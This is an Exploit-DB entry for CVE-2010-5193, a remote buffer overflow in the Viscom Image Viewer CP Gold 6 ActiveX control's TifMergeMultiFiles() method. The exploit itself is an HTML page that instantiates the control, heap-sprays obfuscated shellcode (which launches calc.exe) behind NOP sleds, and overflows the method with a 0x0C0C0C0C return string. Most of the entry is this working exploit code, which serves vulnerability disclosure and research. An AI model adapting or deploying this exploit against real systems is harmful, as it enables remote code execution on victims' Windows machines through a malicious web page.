Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow

EDB-ID:

15668

CVE:

2010-5193

EDB Verified:

Author:

Dr_IDE

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-12-03

Vulnerable App: 
<html>
<!--
Exploit Title:	Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow Exploit
Found By:	Dr_IDE
Download:	http://www.viscom.com
Greets: 	bz1p, bz1p@bshellz.net for finding the app.
Tested on: 	XP SP3 IE7
CVE: 		(0day)
-->
<object CLASSID="clsid:5220cb21-c88d-11cf-b347-00aa00a28331" width="14" height="14">
<param NAME="LPKPath" VALUE="imageviewer.lpk"></object>
<object classid="clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E" id='target'></object>
<script>
//payload is windows/exec cmd=calc.exe
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;

while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);

while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();

for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0C%0C%0C%0C");

arg2=String("abcd");

target.TIFMergeMultiFiles(arg2, arg2, ret);
</script>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services